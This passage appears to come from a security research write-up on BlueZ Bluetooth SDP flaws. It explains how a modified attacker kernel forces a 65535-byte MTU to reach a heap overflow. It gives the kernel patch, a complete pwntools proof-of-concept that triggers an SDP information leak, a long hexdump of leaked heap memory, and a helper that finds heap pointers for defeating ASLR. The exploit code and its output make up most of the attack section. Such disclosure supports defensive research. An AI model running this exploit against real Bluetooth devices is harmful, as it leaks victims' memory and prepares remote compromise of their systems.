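BUF_SIZE = 0xFFFF    # USHRT_MAX response buffer allocated in process_request

def achievable_response(omtu: int) -> int:
    """Largest response reachable with a single request of size <= omtu."""
    entries = (omtu - PDU_HDR - BODY_OVERHEAD) // ATTR_ENTRY
    return entries * RESP_PER_ATTR

assert achievable_response(672) < BUF_SIZE    # default SDP MTU: no overflow
assert achievable_response(65535) > BUF_SIZE  # raised OMTU: overflow reachable
```

Under these assumptions, a 672-byte request yields only a few kilobytes of response, far short of the 65535-byte buffer; with the OMTU forced up to 65535 the overflow becomes reachable, which is exactly what the next section is about.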
Since the limiting factor seemed to be the MTU imposed by L2CAP, we investigated further how this MTU gets set and whether we can do anything about it. Normally, we can only specify the maximum size of incoming packets (IMTU), but not the size of packets the other side is willing to accept (OMTU). After looking at the way L2CAP handles the negotiation of these values, we found that it is also possible to reject the configuration supplied by the other side. If we reject a configuration parameter, we can supply a suggestion for a better value that we would accept. If this happens for the OMTU, BlueZ will simply accept whatever suggestion it gets sent. This allows us to force the other side to use whatever OMTU we want. Then we can send much larger SDP attribute requests, containing enough attributes to overflow the heap. In simplified form, the MTU negotiation looks like this:

- attacker: I want to open an L2CAP connection, my MTU is 65536
- victim: ok, I will send you packets up to 65536 bytes; my MTU is 672, please do not send larger packets
- (normally, the negotiation would be done here)
- attacker: that MTU is not acceptable to me, I will only open the connection if I can send you packets up to 65536 bytes
- victim: ok, I will allow you to send packets up to 65536 bytes

Unfortunately, Linux does not allow us to reject any MTU values, so we modified the kernel on the attacker machine to implement the behavior described above. Please note that this behavior is not a security vulnerability in itself: it follows the specification, which states that it should be possible to reject configuration parameters and suggest acceptable ones. Normally it would not be a problem to increase the MTU size; it is only because of the heap overflow that this causes trouble.

Modifying the kernel

Important: only the ATTACKER has to modify their kernel. The victim kernel does not need to be modified; otherwise this would not be a vulnerability at all. In our case, we used a Linux 4.13 kernel.
Here are the required modifications. Before compiling the kernel, you need to modify l2cap_parse_conf_req in net/bluetooth/l2cap_core.c:

3428     if (result == L2CAP_CONF_SUCCESS) {
3429         /* Configure output options and let the other side know
3430          * which ones we don't like. */
3431
3432         if (mtu < L2CAP_DEFAULT_MIN_MTU) {
3433             result = L2CAP_CONF_UNACCEPT;
3434         } else if (chan->omtu != 65535) {
3435             set_bit(CONF_MTU_DONE, &chan->conf_state);
3436             printk(KERN_INFO "hax setting omtu to 65535 from %d\n", chan->omtu);
3437             chan->omtu = 65535;
3438             result = L2CAP_CONF_UNACCEPT;
3439
3440         } else {
3441             chan->omtu = mtu;
3442             set_bit(CONF_MTU_DONE, &chan->conf_state);
3443         }
3444         l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu, endptr - ptr);

We added the “else if” branch, which ensures we do not accept the configuration as long as the OMTU isn’t 65535. Additionally, we added a printk so we can verify that the branch was triggered correctly by viewing the kernel log. Once you have compiled your modified kernel, you can run the PoC attached to this writeup.

Conclusion

Implementing a complete Bluetooth stack correctly is extremely challenging. There are dozens of different protocols involved, which often implement the same features. This can, for instance, be seen with the fragmentation in SDP. All this complexity creates a huge attack surface.
We have demonstrated that multiple critical issues can be found within just a single, commonly used protocol. It seems highly likely that other parts of BlueZ contain similar vulnerabilities; more research is definitely required to ensure the Linux Bluetooth stack is secure against attacks.

Exploits

Information leak PoC:

from pwn import *
import bluetooth

if not 'TARGET' in args:
    log.info("Usage: sdp_infoleak_poc.py TARGET=XX:XX:XX:XX:XX:XX")
    exit()

# the configuration here depends on the victim device.
# Discovery could be automated but for a simple PoC it would be a bit overkill
# the attacker can simply gather the required information by running
# sdptool browse --xml XX:XX:XX:XX:XX:XX
# on his machine (replace XX:XX:XX:XX:XX:XX with victim MAC)
# I have chosen to request attributes from the Generic Access Profile
# but it does not really matter as long as we can generate a response with a
# size large enough to create a continuation state
# on my machine, sdptool prints the following:
# <attribute id="0x0000">
#     <uint32 value="0x00010001" />
# </attribute>
# [...]
# <attribute id="0x0102">
#     <text value="BlueZ" />
# </attribute>
# please replace these values if they should not match your victim device

# the service from which we want to request attributes (GAP)
SERVICE_REC_HANDLE = 0x00010001
# the attribute we want to request (in this case, the String "BlueZ")
SERVICE_ATTR_ID = 0x0102

target = args['TARGET'] # TARGET Mac address
mtu = 65535             # MTU to use
context.endian = 'big'

# this is how many bytes we want to leak
# you can set it up to 0x7FFF
# if you set it to 0x8000 or higher, the victim will crash
# I have experienced that with slow Bluetooth hardware, large leaks can
# sometimes result in timeouts so I don't recommend to set it larger than
# 0x0FFF for this PoC
LEAK_BYTES = 0x0FFF

# this function crafts a SDP attribute request packet
# handle: the service we want to query
# max_rsp_size: how many bytes we are willing to accept in a single response packet
# attr: the attribute(s) we want to query
# cstate: the cstate to send
def sdppacket(handle, max_rsp_size, attr, cstate):
    # craft packet to reach vulnerable code
    pkt = ""
    pkt += p32(handle)       # handle
    pkt += p16(max_rsp_size) # max_rsp_size

    # contains an attribute sequence with the length describing the attributes being 16 bit long
    # see extract_des function in line 113 of src/sdpd-request.c
    pkt += p8(0x36)          # DTD (seq_type SDP_SEQ16)
    pkt += p16(len(attr))    # seq size, 16 bit according to DTD

    # attributes
    pkt += attr

    # append cstate
    if cstate:
        pkt += p8(len(cstate))
        pkt += cstate
    else:
        pkt += p8(0x00)      # no cstate

    pduhdr = ""
    pduhdr += p8(0x04)       # pdu_id 0x04 -> SVC_ATTR_REQ (we want to send an attribute request)
    pduhdr += p16(0x0000)    # TID, doesn't matter
    pduhdr += p16(len(pkt))  # plen, length of body

    return pduhdr + pkt

if __name__ == '__main__':
    log.info('Creating L2CAP socket')
    sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bluetooth.set_l2cap_mtu(sock, mtu)

    log.info('Connecting to target')
    sock.connect((target, 0x0001)) # connect to target on PSM 0x0001 (SDP)
    log.info('Sending packet to prepare serverside cstate')

    # the attribute we want to read
    attr = p8(0x09)              # length of ATTR_ID (SDP_UINT16 - see lib/sdp.h)
    attr += p16(SERVICE_ATTR_ID)

    # craft the packet
    sdp = sdppacket(
        SERVICE_REC_HANDLE, # the service handle
        101,                # max size of the response we are willing to accept
        attr*10,            # just request the same attribute 10 times, response will be 102 bytes large
        None)               # no cstate for now

    sock.send(sdp)

    # receive response to first packet
    data = sock.recv(mtu)

    # parse the cstate we received from the server
    cstate_len_index = len(data)-9
    cstate_len = u8(data[cstate_len_index], endian='little')

    # sanity check: cstate length should always be 8 byte
    if cstate_len != 8:
        log.error('We did not receive a cstate with the length we expected, check if the attribute ids are correct')
        exit(1)

    # the cstate contains a timestamp which is used as a "key" on the server to find the
    # cstate data again. We will just send the same value back
    timestamp = u32(data[cstate_len_index+1:cstate_len_index+5], endian='little')

    # offset will be the value of cstate->cStateValue.maxBytesSent when we send it back
    offset = u16(data[cstate_len_index+5:cstate_len_index+7], endian='little')

    log.info("cstate: len=%d timestamp=%x offset=%d" % (cstate_len, timestamp, offset))

    if offset != 101:
        log.error('we expected to receive an offset of size 101, check if the attribute request is correct')
        exit(2)

    # now we craft our malicious cstate
    cstate = p32(timestamp, endian='little')   # just send back the same timestamp
    cstate += p16(offset+100, endian='little') # increase the offset by 100 to cause underflow
    cstate += p16(0x0000, endian='little')     # 0x0000 to indicate end of cstate

    log.info('Triggering infoleak...')

    # now we send the second packet that triggers the information leak
    # the manipulated CSTATE will cause an underflow that will make the server
    # send us LEAK_BYTES bytes instead of the correct amount.
    sdp = sdppacket(SERVICE_REC_HANDLE, LEAK_BYTES, attr*10, cstate)
    sock.send(sdp)

    # receive leaked data
    data = sock.recv(mtu)

    log.info("The response is %d bytes large" % len(data))
    print hexdump(data)
If everything happens as expected, we shall get output similar to this:

[*] Creating L2CAP socket
[*] Connecting to target
[*] Sending packet to prepare serverside cstate
[*] cstate: len=8 timestamp=5aa54c56 offset=101
[*] Triggering infoleak...
[*] The response is 4111 bytes large
00000000 05 00 00 10 0a 0f ff 68 6e 6f 6c 6f 67 69 65 73 │····│···h│nolo│gies│
00000010 3d 42 52 2f 45 44 52 3b 0a 54 72 75 73 74 65 64 │=BR/│EDR;│·Tru│sted│
00000020 3d 66 61 6c 73 65 0a 42 6c 6f 63 6b 65 64 3d 66 │=fal│se·B│lock│ed=f│
00000030 61 6c 73 65 0a 53 65 72 76 69 63 65 73 3d 30 30 │alse│·Ser│vice│s=00│
00000040 30 30 31 31 30 35 2d 30 30 30 30 2d 31 30 30 30 │0011│05-0│000-│1000│
00000050 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 │-800│0-00│805f│9b34│
00000060 66 62 3b 30 30 30 30 31 31 30 36 2d 30 30 30 30 │fb;0│0001│106-│0000│
00000070 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 │-100│0-80│00-0│0805│
00000080 66 39 62 33 34 66 62 3b 30 30 30 30 31 31 30 61 │f9b3│4fb;│0000│110a│
00000090 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d │-000│0-10│00-8│000-│
000000a0 30 30 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 │0080│5f9b│34fb│;000│
000000b0 30 31 31 30 63 2d 30 30 30 30 2d 31 30 30 30 2d │0110│c-00│00-1│000-│
000000c0 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 │8000│-008│05f9│b34f│
000000d0 62 3b 30 30 30 30 31 31 30 65 2d 30 30 30 30 2d │b;00│0011│0e-0│000-│
000000e0 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 │1000│-800│0-00│805f│
000000f0 39 62 33 34 66 62 3b 30 30 30 30 31 31 31 32 2d │9b34│fb;0│0001│112-│
00000100 30 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 │0000│-100│0-80│00-0│
00000110 30 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 │0805│f9b3│4fb;│0000│
00000120 31 31 31 35 2d 30 30 30 30 2d 31 30 30 30 2d 38 │1115│-000│0-10│00-8│
00000130 30 30
30 2d 30 30 38 30 35 66 39 62 33 34 66 62 │000-│0080│5f9b│34fb│
00000140 3b 30 30 30 30 31 31 31 36 2d 30 30 30 30 2d 31 │;000│0111│6-00│00-1│
00000150 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 │000-│8000│-008│05f9│
00000160 62 33 34 66 62 3b 30 30 30 30 31 31 31 66 2d 30 │b34f│b;00│0011│1f-0│
00000170 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 │000-│1000│-800│0-00│
00000180 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 31 │805f│9b34│fb;0│0001│
00000190 31 32 66 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 │12f-│0000│-100│0-80│
000001a0 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 3b │00-0│0805│f9b3│4fb;│
000001b0 30 30 30 30 31 31 33 32 2d 30 30 30 30 2d 31 30 │0000│1132│-000│0-10│
000001c0 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 │00-8│000-│0080│5f9b│
000001d0 33 34 66 62 3b 30 30 30 30 31 32 30 30 2d 30 30 │34fb│;000│0120│0-00│
000001e0 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 38 │00-1│000-│8000│-008│
000001f0 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 31 38 │05f9│b34f│b;00│0018│
00000200 30 30 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 │00-0│000-│1000│-800│
00000210 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 3b 30 │0-00│805f│9b34│fb;0│
00000220 30 30 30 31 38 30 31 2d 30 30 30 30 2d 31 30 30 │0001│801-│0000│-100│
00000230 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 │0-80│00-0│0805│f9b3│
00000240 34 66 62 3b 30 30 30 30 36 36 37 35 2d 37 34 37 │4fb;│0000│6675│-747│
00000250 35 2d 37 32 36 35 2d 36 34 36 39 2d 36 31 36 63 │5-72│65-6│469-│616c│
00000260 36 32 37 35 36 64 37 30 3b 0a 0a 5b 44 65 76 69 │6275│6d70│;··[│Devi│
00000270 63 65 49 44 5d 0a 53 6f 75 72 63 65 3d 31 0a 56 │ceID│]·So│urce│=1·V│
00000280 65 6e 64 6f 72 3d 31 35 0a 50 72 6f 64 75 63 74 │endo│r=15│·Pro│duct│
00000290 3d 34 36 30 38 0a 56 65 72 73 69 6f 6e 3d 35 31 │=460│8·Ve│rsio│n=51│
000002a0 37 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 │74··│····│····│····│
000002b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
*
000003d0 00 00 00 00 00 00 41 00 00
00 00 00 00 00 35 00 │····│··A·│····│··5·│
000003e0 04 00 00 00 00 00 80 4d 40 27 aa 55 00 00 00 00 │····│···M│@'·U│····│
000003f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000400 00 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000410 00 00 00 00 00 00 41 00 00 00 00 00 00 00 09 00 │····│··A·│····│····│
00000420 11 03 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000440 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000450 00 00 00 00 00 00 31 00 00 00 00 00 00 00 01 00 │····│··1·│····│····│
00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 │····│····│····│··0·│
00000480 00 00 00 00 00 00 31 00 00 00 00 00 00 00 f0 b5 │····│··1·│····│····│
00000490 41 27 aa 55 00 00 8c 45 a5 5a 00 00 00 00 30 b9 │A'·U│···E│·Z··│··0·│
000004a0 41 27 aa 55 00 00 66 00 00 00 66 00 00 00 33 34 │A'·U│··f·│··f·│··34│
000004b0 66 62 00 00 00 00 11 04 00 00 00 00 00 00 20 17 │fb··│····│····│·· ·│
000004c0 41 27 aa 55 00 00 45 20 6e 6f 64 65 20 50 55 42 │A'·U│··E │node│ PUB│
000004d0 4c 49 43 20 22 2d 2f 2f 66 72 65 65 64 65 73 6b │LIC │"-//│free│desk│
000004e0 74 6f 70 2f 2f 44 54 44 20 44 2d 42 55 53 20 4f │top/│/DTD│ D-B│US O│
000004f0 62 6a 65 63 74 20 49 6e 74 72 6f 73 70 65 63 74 │bjec│t In│tros│pect│
00000500 69 6f 6e 20 31 2e 30 2f 2f 45 4e 22 0a 22 68 74 │ion │1.0/│/EN"│·"ht│
00000510 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 64 65 73 │tp:/│/www│.fre│edes│
00000520 6b 74 6f 70 2e 6f 72 67 2f 73 74 61 6e 64 61 72 │ktop│.org│/sta│ndar│
00000530 64 73 2f 64 62 75 73 2f 31 2e 30 2f 69 6e 74 72 │ds/d│bus/│1.0/│intr│
00000540 6f 73 70 65 63 74 2e 64 74 64 22 3e 0a 3c 6e 6f │ospe│ct.d│td">│·<no│
00000550 64 65 3e 3c 69 6e 74 65 72 66 61 63 65 20 6e 61 │de><│inte│rfac│e na│
00000560 6d 65 3d 22 6f 72 67 2e 66 72 65 65 64 65 73 6b
│me="│org.│free│desk│
00000570 74 6f 70 2e 44 42 75 73 2e 49 6e 74 72 6f 73 70 │top.│DBus│.Int│rosp│
00000580 65 63 74 61 62 6c 65 22 3e 3c 6d 65 74 68 6f 64 │ecta│ble"│><me│thod│
00000590 20 6e 61 6d 65 3d 22 49 6e 74 72 6f 73 70 65 63 │ nam│e="I│ntro│spec│
000005a0 74 22 3e 3c 61 72 67 20 6e 61 6d 65 3d 22 78 6d │t"><│arg │name│="xm│
000005b0 6c 22 20 74 79 70 65 3d 22 73 22 20 64 69 72 65 │l" t│ype=│"s" │dire│
000005c0 63 74 69 6f 6e 3d 22 6f 75 74 22 2f 3e 0a 3c 2f │ctio│n="o│ut"/│>·</│
000005d0 6d 65 74 68 6f 64 3e 3c 2f 69 6e 74 65 72 66 61 │meth│od><│/int│erfa│
000005e0 63 65 3e 3c 69 6e 74 65 72 66 61 63 65 20 6e 61 │ce><│inte│rfac│e na│
000005f0 6d 65 3d 22 6f 72 67 2e 66 72 65 65 64 65 73 6b │me="│org.│free│desk│
00000600 74 6f 70 2e 44 42 75 73 2e 4f 62 6a 65 63 74 4d │top.│DBus│.Obj│ectM│
00000610 61 6e 61 67 65 72 22 3e 3c 6d 65 74 68 6f 64 20 │anag│er">│<met│hod │
00000620 6e 61 6d 65 3d 22 47 65 74 4d 61 6e 61 67 65 64 │name│="Ge│tMan│aged│
00000630 4f 62 6a 65 63 74 73 22 3e 3c 61 72 67 20 6e 61 │Obje│cts"│><ar│g na│
00000640 6d 65 3d 22 6f 62 6a 65 63 74 73 22 20 74 79 70 │me="│obje│cts"│ typ│
00000650 65 3d 22 61 7b 6f 61 7b 73 61 7b 73 76 7d 7d 7d │e="a│{oa{│sa{s│v}}}│
00000660 22 20 64 69 72 65 63 74 69 6f 6e 3d 22 6f 75 74 │" di│rect│ion=│"out│
00000670 22 2f 3e 0a 3c 2f 6d 65 74 68 6f 64 3e 3c 73 69 │"/>·│</me│thod│><si│
00000680 67 6e 61 6c 20 6e 61 6d 65 3d 22 49 6e 74 65 72 │gnal│ nam│e="I│nter│
00000690 66 61 63 65 73 41 64 64 65 64 22 3e 3c 61 72 67 │face│sAdd│ed">│<arg│
000006a0 20 6e 61 6d 65 3d 22 6f 62 6a 65 63 74 22 20 74 │ nam│e="o│bjec│t" t│
000006b0 79 70 65 3d 22 6f 22 2f 3e 0a 3c 61 72 67 20 6e │ype=│"o"/│>·<a│rg n│
000006c0 61 6d 65 3d 22 69 6e 74 65 72 66 61 63 65 73 22 │ame=│"int│erfa│ces"│
000006d0 20 74 79 70 65 3d 22 61 7b 73 61 7b 73 76 7d 7d │ typ│e="a│{sa{│sv}}│
000006e0 22 2f 3e 0a 3c 2f 73 69 67 6e 61 6c 3e 0a 3c 73 │"/>·│</si│gnal│>·<s│
000006f0 69 67 6e 61 6c 20 6e 61 6d 65 3d 22 49 6e 74 65 │igna│l na│me="│Inte│
00000700 72 66 61 63 65 73 52 65 6d 6f 76 65 64 22 3e 3c │rfac│esRe│move│d"><│
00000710 61 72 67 20 6e 61 6d 65 3d 22 6f 62 6a 65 63 74 │arg │name│="ob│ject│
00000720 22 20 74 79 70 65 3d 22 6f 22 2f 3e 0a 3c 61 72 │" ty│pe="│o"/>│·<ar│
00000730 67 20 6e 61 6d 65 3d 22 69 6e 74 65 72 66 61 63 │g na│me="│inte│rfac│
00000740 65 73 22 20 74 79 70 65 3d 22 61 73 22 2f 3e 0a │es" │type│="as│"/>·│
00000750 3c 2f 73 69 67 6e 61 6c 3e 0a 3c 2f 69 6e 74 65 │</si│gnal│>·</│inte│
00000760 72 66 61 63 65 3e 3c 6e 6f 64 65 20 6e 61 6d 65 │rfac│e><n│ode │name│
00000770 3d 22 6f 72 67 22 2f 3e 3c 2f 6e 6f 64 65 3e 00 │="or│g"/>│</no│de>·│
00000780 30 30 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 │00-0│000-│1000│-800│
00000790 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 00 00 │0-00│805f│9b34│fb··│
000007a0 00 00 24 00 00 00 30 30 30 30 31 38 30 30 2d 30 │··$·│··00│0018│00-0│
000007b0 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 │000-│1000│-800│0-00│
000007c0 38 30 35 66 39 62 33 34 66 62 00 00 00 00 24 00 │805f│9b34│fb··│··$·│
000007d0 00 00 30 30 30 30 31 38 30 31 2d 30 30 30 30 2d │··00│0018│01-0│000-│
000007e0 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 │1000│-800│0-00│805f│
000007f0 39 62 33 34 66 62 00 00 00 00 24 00 00 00 30 30 │9b34│fb··│··$·│··00│
00000800 30 30 36 36 37 35 2d 37 34 37 35 2d 37 32 36 35 │0066│75-7│475-│7265│
00000810 2d 36 34 36 39 2d 36 31 36 63 36 32 37 35 36 64 │-646│9-61│6c62│756d│
00000820 37 30 00 00 00 00 08 00 00 00 4d 6f 64 61 6c 69 │70··│····│··Mo│dali│
00000830 61 73 00 01 73 00 19 00 00 00 62 6c 75 65 74 6f │as··│s···│··bl│ueto│
00000840 6f 74 68 3a 76 30 30 30 46 70 31 32 30 30 64 31 │oth:│v000│Fp12│00d1│
00000850 34 33 36 00 00 00 07 00 00 00 41 64 61 70 74 65 │436·│····│··Ad│apte│
00000860 72 00 01 6f 00 00 0f 00 00 00 2f 6f 72 67 2f 62 │r··o│····│··/o│rg/b│
00000870 6c 75 65 7a 2f 68 63 69 30 00 00 00 00 00 10 00 │luez│/hci│0···│····│
00000880 00 00 53 65 72 76 69 63 65 73 52 65 73 6f 6c 76 │··Se│rvic│esRe│solv│
00000890 65 64 00 01 62
00 00 00 00 00 00 00 00 00 1f 00 │ed··│b···│····│····│ 000008a0 00 00 6f 72 67 2e 66 72 65 65 64 65 73 6b 74 6f │··or│g.fr│eede│skto│ 000008b0 70 2e 44 42 75 73 2e 50 72 6f 70 65 72 74 69 65 │p.DB│us.P│rope│rtie│ 000008c0 73 00 00 00 00 00 11 02 00 00 00 00 00 00 a0 29 │s···│····│····│···)│ 000008d0 41 27 aa 55 00 00 74 77 6f 72 6b 31 00 00 18 00 │A'·U│··tw│ork1│····│ 000008e0 00 00 00 00 00 00 09 00 00 00 43 6f 6e 6e 65 63 │····│····│··Co│nnec│ 000008f0 74 65 64 00 01 62 00 00 00 00 00 00 00 00 17 00 │ted·│·b··│····│····│ 00000900 00 00 6f 72 67 2e 62 6c 75 65 7a 2e 4d 65 64 69 │··or│g.bl│uez.│Medi│ 00000910 61 43 6f 6e 74 72 6f 6c 31 00 18 00 00 00 09 00 │aCon│trol│1···│····│ 00000920 00 00 43 6f 6e 6e 65 63 74 65 64 00 01 62 00 00 │··Co│nnec│ted·│·b··│ 00000930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ac0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 │····│····│····│····│ 00000ad0 00 00 00 00 00 00 11 02 00 00 00 00 00 00 b0 2b │····│····│····│···+│ 00000ae0 41 27 aa 55 00 00 00 00 00 00 00 00 00 00 01 00 │A'·U│····│····│····│ 00000af0 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 │····│····│····│····│ 00000b30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000b60 00 00 00 00 00 00 11 00 00 00 00 00 00 00 12 00 │····│····│····│····│ 00000b70 00 00 00 00 00 00 13 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000bb0 00 00 00 00 00 00 1b 00 00 00 00 00 00 00 1c 00 │····│····│····│····│ 00000bc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000bd0 00 00 00 00 00 00 1f 00 00 00 00 00 00 00 20 00 │····│····│····│·· ·│ 00000be0 00 00 00 00 00 00 21 00 00 00 00 
00 00 00 00 00 │····│··!·│····│····│ 00000bf0 00 00 00 00 00 00 23 00 00 00 00 00 00 00 24 00 │····│··#·│····│··$·│ 00000c00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000c80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 │····│····│····│··6·│ 00000c90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ce0 00 00 00 00 00 00 11 02 00 00 00 00 00 00 20 ca │····│····│····│·· ·│ 00000cf0 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 60 d5 │@'·U│····│····│··`·│ 00000d00 3f 27 aa 55 00 00 80 3f 40 27 aa 55 00 00 00 00 │?'·U│···?│@'·U│····│ 00000d10 00 00 00 00 00 00 e0 48 40 27 aa 55 00 00 00 00 │····│···H│@'·U│····│ 00000d20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000d30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 54 │····│····│····│···T│ 00000d40 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000d50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000d70 00 00 00 00 00 00 d0 82 40 27 aa 55 00 00 80 8b │····│····│@'·U│····│ 00000d80 40 27 aa 55 00 00 a0 8c 40 27 aa 55 00 00 00 00 │@'·U│····│@'·U│····│ 00000d90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000dc0 00 00 00 00 00 00 70 a8 40 27 aa 55 00 00 50 a9 │····│··p·│@'·U│··P·│ 00000dd0 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000de0 00 00 00 00 00 00 10 c6 40 27 aa 55 00 00 c0 c6 │····│····│@'·U│····│ 00000df0 40 27 aa 55 00 00 20 c8 40 27 aa 55 00 00 00 00 │@'·U│·· ·│@'·U│····│ 00000e00 00 00 00 00 00 00 60 d3 40 27 aa 55 00 00 d0 d4 │····│··`·│@'·U│····│ 00000e10 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000e20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000e90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 a2 │····│····│····│····│ 00000ea0 41 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │A'·U│····│····│····│ 00000eb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
│····│····│····│····│ * 00000ef0 00 00 00 00 00 00 51 00 00 00 00 00 00 00 80 e5 │····│··Q·│····│····│ 00000f00 3f 27 aa 55 00 00 2f 62 6c 75 65 74 6f 6f 74 68 │?'·U│··/b│luet│ooth│ 00000f10 2f 37 30 3a 46 33 3a 39 35 3a 37 41 3a 42 39 3a │/70:│F3:9│5:7A│:B9:│ 00000f20 43 38 2f 63 61 63 68 65 2f 30 30 3a 31 41 3a 37 │C8/c│ache│/00:│1A:7│ 00000f30 44 3a 44 41 3a 37 31 3a 31 31 2e 57 46 53 49 46 │D:DA│:71:│11.W│FSIF│ 00000f40 5a 00 00 00 00 00 21 00 00 00 00 00 00 00 01 00 │Z···│··!·│····│····│ 00000f50 00 00 17 00 00 00 18 00 00 00 19 00 00 00 30 75 │····│····│····│··0u│ 00000f60 00 00 00 00 00 00 51 00 00 00 00 00 00 00 40 e1 │····│··Q·│····│··@·│ 00000f70 41 27 aa 55 00 00 70 81 40 27 aa 55 00 00 20 00 │A'·U│··p·│@'·U│·· ·│ 00000f80 00 00 00 00 00 00 30 00 00 00 00 00 00 00 70 81 │····│··0·│····│··p·│ 00000f90 40 27 aa 55 00 00 73 76 7d 61 73 00 00 00 20 00 │@'·U│··sv│}as·│·· ·│ 00000fa0 00 00 00 00 00 00 f0 c4 40 27 aa 55 00 00 50 00 │····│····│@'·U│··P·│ 00000fb0 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000fc0 00 00 00 00 00 00 00 12 41 27 aa 55 00 00 18 00 │····│····│A'·U│····│ 00000fd0 00 00 20 00 00 00 00 00 00 00 00 00 00 00 ff ff │·· ·│····│····│····│ 00000fe0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff │····│····│····│····│ * 00001000 ff ff ff ff ff ff 08 56 4c a5 5a c8 10 00 00 │····│···V│L·Z·│···│ 0000100f 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 
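One practical note on reading the leak: the recurring `41 27 aa 55 00 00` byte runs in the dump decode, as little-endian qwords, to userland heap pointers of the form 0x55aa2741xxxx — exactly the kind of ASLR-defeating information this infoleak provides. As a quick illustration (my own helper, not part of the advisory), a leaked blob can be scanned for pointer-shaped qwords:

```python
import struct

def find_heap_pointers(blob, hi=0x55aa):
    """Scan a leaked blob for little-endian qwords whose top bytes look
    like a typical x86-64 userland heap address (here: 0x55aa........)."""
    ptrs = []
    for off in range(0, len(blob) - 7):
        val = struct.unpack_from('<Q', blob, off)[0]
        if (val >> 32) == hi:
            ptrs.append((off, val))
    return ptrs

# bytes lifted from the dump above: "a0 29 41 27 aa 55 00 00"
leak = bytes.fromhex('a0294127aa550000')
print(['0x%x' % v for _, v in find_heap_pointers(leak)])  # ['0x55aa274129a0']
```

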